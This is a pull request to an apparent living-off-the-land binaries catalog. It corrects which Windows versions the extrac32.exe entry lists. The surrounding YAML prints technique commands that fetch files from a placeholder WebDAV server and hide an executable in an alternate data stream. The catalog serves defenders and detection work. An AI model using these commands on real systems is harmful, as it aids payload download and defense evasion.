### PR TITLE
extrac32.exe existed loong before Vista

### DIFF
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@@ -10,7 +10,7 @@ Commands:
     Category: ADS
     Privileges: User
     MitreID: T1564.004
-    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
@@ -19,7 +19,7 @@ Commands:
     Category: ADS
     Privileges: User
     MitreID: T1564.004
-    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
@@ -28,14 +28,14 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
   - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
     Description: Command for copying calc.exe to another folder
     Usecase: Copy file
     Category: Copy
     Privileges: User
     MitreID: T1105
-    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\extrac32.exe
   - Path: C:\Windows\SysWOW64\extrac32.exe

--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@@ -10,7 +10,7 @@ Commands:
     Category: ADS
     Privileges: User
     MitreID: T1564.004
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
@@ -19,7 +19,7 @@ Commands:
     Category: ADS
     Privileges: User
     MitreID: T1564.004
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
@@ -28,14 +28,14 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
   - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
     Description: Command for copying calc.exe to another folder
     Usecase: Copy file
     Category: Copy
     Privileges: User
     MitreID: T1105
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\extrac32.exe
   - Path: C:\Windows\SysWOW64\extrac32.exe


### PR DESCRIPTION
extrac32.exe existed loong before Vista

I know this, because I used it for unintended purposes long before I knew what LOLBAS is (I'll contribute shortly)

This resource lists it in relation to Windows 2000, 
> https://www.cs.toronto.edu/~simon/howto/win2kcommands.html

This resource lists it in relation to Windows XP,
> https://www.informit.com/articles/article.aspx?p=101731&seqNum=2
> https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf (PDF page 14 / book page 60)

This PR adds this information to YML